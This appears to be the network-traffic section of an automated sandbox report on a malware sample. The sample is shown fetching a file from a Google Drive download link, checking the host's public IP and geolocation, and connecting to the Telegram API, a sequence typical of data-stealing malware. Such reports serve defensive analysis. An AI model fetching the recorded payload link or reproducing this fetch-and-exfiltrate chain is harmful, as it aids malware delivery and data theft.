                                                                                                    Jan 11, 2025 00:04:15.689691067 CET44349705142.250.186.78192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.689735889 CET49705443192.168.2.5142.250.186.78
                                                                                                    Jan 11, 2025 00:04:15.717082977 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:15.717128038 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.717197895 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:15.717627048 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:15.717649937 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:16.372529984 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:16.372670889 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:16.378149986 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:16.378175020 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:16.378540993 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:16.380213022 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:16.380642891 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:16.427334070 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:18.919419050 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:18.919514894 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:18.925307989 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:18.925395966 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:18.937696934 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:18.937777042 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:18.937800884 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:18.937895060 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:18.944051027 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:18.944108963 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.009730101 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.009825945 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.009856939 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.009869099 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.009879112 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.009884119 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.009922028 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.010195971 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.010257006 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.014770031 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.014837980 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.014863968 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.014929056 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.021070004 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.021178007 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.021203041 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.021262884 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.027487993 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.028223038 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.028234005 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.028275013 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.033684015 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.033843994 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.033852100 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.033910036 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.040102005 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.040251970 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.040273905 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.040328979 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.046345949 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.046401024 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.046427965 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.046471119 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.052186966 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.052257061 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.052273989 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.052323103 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.058001041 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.058084011 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.058094978 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.058145046 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.063694000 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.063771009 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.063781977 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.063865900 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.069458961 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.069665909 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.074817896 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.075030088 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.075309992 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.075423002 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.100403070 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.100564957 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.100589037 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.100630999 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.100649118 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.100761890 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.100795984 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.100804090 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.100825071 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.100847006 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.101170063 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.101236105 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.101260900 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.101514101 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.101522923 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.101632118 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.101684093 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.101692915 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.102006912 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.105907917 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.105997086 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.106019974 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.106056929 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.111339092 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.111476898 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.111495972 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.111541033 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.116338968 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.116493940 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.116503954 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.116544008 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.121735096 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.121803999 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.121815920 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.121859074 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.127744913 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.127832890 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.127861977 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.127904892 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.135169029 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.135231018 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.135237932 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.135334015 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.146336079 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.146398067 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.146408081 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.146450043 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.157720089 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.157774925 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.157793999 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.157845020 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.158626080 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.158704042 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.158767939 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.158814907 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.159131050 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.159178019 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.159285069 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.159331083 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.160044909 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.160094976 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.160743952 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.160809040 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.160815001 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.160856009 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.160861015 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.160919905 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.160959959 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.161011934 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.161025047 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.161052942 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.161062002 CET44349711172.217.16.193192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.161073923 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.161091089 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.161104918 CET49711443192.168.2.5172.217.16.193
                                                                                                    Jan 11, 2025 00:04:19.595201969 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:04:19.600155115 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.600244045 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:04:19.600739002 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:04:19.605675936 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:04:20.343686104 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:04:20.348366976 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:04:20.353277922 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:04:20.598328114 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:04:20.641993046 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:04:20.990341902 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:20.990376949 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:20.990447044 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:20.993060112 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:20.993077040 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:21.458178997 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:21.458339930 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:21.464464903 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:21.464493036 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:21.464848042 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:21.478431940 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:21.523334980 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:21.587506056 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:21.587563992 CET44349749104.21.16.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:21.587606907 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:21.593924046 CET49749443192.168.2.5104.21.16.1
                                                                                                    Jan 11, 2025 00:04:27.021626949 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:04:27.026473045 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.125792027 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.137552023 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:27.137615919 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.137701035 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:27.138174057 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:27.138212919 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.173383951 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:04:27.797231913 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.797313929 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:27.799690962 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:27.799711943 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.800029993 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.801692009 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:27.847331047 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.847382069 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:27.847393036 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:28.155710936 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:28.155792952 CET44349784149.154.167.220192.168.2.5
                                                                                                    Jan 11, 2025 00:04:28.155884027 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:04:28.156332016 CET49784443192.168.2.5149.154.167.220
                                                                                                    Jan 11, 2025 00:05:32.127666950 CET8049738193.122.130.0192.168.2.5
                                                                                                    Jan 11, 2025 00:05:32.127772093 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:06:07.110881090 CET4973880192.168.2.5193.122.130.0
                                                                                                    Jan 11, 2025 00:06:07.115710974 CET8049738193.122.130.0192.168.2.5
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 11, 2025 00:04:14.528121948 CET6391753192.168.2.51.1.1.1
                                                                                                    Jan 11, 2025 00:04:14.535017014 CET53639171.1.1.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:15.709531069 CET5731653192.168.2.51.1.1.1
                                                                                                    Jan 11, 2025 00:04:15.716190100 CET53573161.1.1.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:19.583185911 CET6095753192.168.2.51.1.1.1
                                                                                                    Jan 11, 2025 00:04:19.589947939 CET53609571.1.1.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:20.982286930 CET5064153192.168.2.51.1.1.1
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET53506411.1.1.1192.168.2.5
                                                                                                    Jan 11, 2025 00:04:27.129786015 CET5596053192.168.2.51.1.1.1
                                                                                                    Jan 11, 2025 00:04:27.136850119 CET53559601.1.1.1192.168.2.5
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 11, 2025 00:04:14.528121948 CET192.168.2.51.1.1.10xa421Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:15.709531069 CET192.168.2.51.1.1.10x207Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:19.583185911 CET192.168.2.51.1.1.10x3fc8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.982286930 CET192.168.2.51.1.1.10xdd01Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:27.129786015 CET192.168.2.51.1.1.10x95bbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 11, 2025 00:04:14.535017014 CET1.1.1.1192.168.2.50xa421No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:15.716190100 CET1.1.1.1192.168.2.50x207No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:19.589947939 CET1.1.1.1192.168.2.50x3fc8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:19.589947939 CET1.1.1.1192.168.2.50x3fc8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:19.589947939 CET1.1.1.1192.168.2.50x3fc8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:19.589947939 CET1.1.1.1192.168.2.50x3fc8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:19.589947939 CET1.1.1.1192.168.2.50x3fc8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:19.589947939 CET1.1.1.1192.168.2.50x3fc8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET1.1.1.1192.168.2.50xdd01No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET1.1.1.1192.168.2.50xdd01No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET1.1.1.1192.168.2.50xdd01No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET1.1.1.1192.168.2.50xdd01No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET1.1.1.1192.168.2.50xdd01No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET1.1.1.1192.168.2.50xdd01No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:20.989618063 CET1.1.1.1192.168.2.50xdd01No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                    Jan 11, 2025 00:04:27.136850119 CET1.1.1.1192.168.2.50x95bbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                    • drive.google.com
                                                                                                    • drive.usercontent.google.com
                                                                                                    • reallyfreegeoip.org
                                                                                                    • api.telegram.org
                                                                                                    • checkip.dyndns.org
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.549738193.122.130.0801476C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 11, 2025 00:04:19.600739002 CET151OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 11, 2025 00:04:20.343686104 CET321INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 10 Jan 2025 23:04:20 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    X-Request-ID: a0c0d588c43600522825fc54b80a4509
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                    Jan 11, 2025 00:04:20.348366976 CET127OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Jan 11, 2025 00:04:20.598328114 CET321INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 10 Jan 2025 23:04:20 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    X-Request-ID: 3f85672b170252aa8f3518c72c74cd00
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                    Jan 11, 2025 00:04:27.021626949 CET127OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                    Host: checkip.dyndns.org
                                                                                                    Jan 11, 2025 00:04:27.125792027 CET321INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 10 Jan 2025 23:04:27 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 104
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Pragma: no-cache
                                                                                                    X-Request-ID: 5c062dd2a464bc7e2ca2ffa142bf7e89
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.549705142.250.186.784431476C:\Users\user\Desktop\WGi85dsMNp.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-10 23:04:15 UTC216OUTGET /uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: drive.google.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2025-01-10 23:04:15 UTC1920INHTTP/1.1 303 See Other
                                                                                                    Content-Type: application/binary
                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                    Date: Fri, 10 Jan 2025 23:04:15 GMT
                                                                                                    Location: https://drive.usercontent.google.com/download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                    Content-Security-Policy: script-src 'nonce-vNfauHT8aksO-_PE-v3HzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
